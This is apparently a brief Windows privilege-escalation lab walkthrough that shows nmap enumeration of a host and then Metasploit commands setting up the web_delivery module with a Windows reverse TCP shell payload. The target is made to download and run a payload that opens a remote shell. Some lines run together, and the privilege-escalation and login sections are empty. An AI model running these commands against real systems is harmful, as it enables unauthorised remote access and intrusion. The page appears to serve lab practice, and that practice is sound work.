win-privesc
Enumeration & Exploitation
nmap -sV 10.2.29.53
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?service postgresql start && msfconsole -qsetg RHOSTS 10.2.29.53
setg RHOST 10.2.29.53
search web_delivery
use exploit/multi/script/web_delivery
info
# Description:
# This module quickly fires up a web server that serves a payload. The
# provided command which will allow for a payload to download and
# execute.
set target PSH\ (Binary)
set payload windows/shell/reverse_tcp
set PSH-EncodedCommand false
set LHOST eth1
exploit



Privilege Escalation


Administrator Login
Last updated
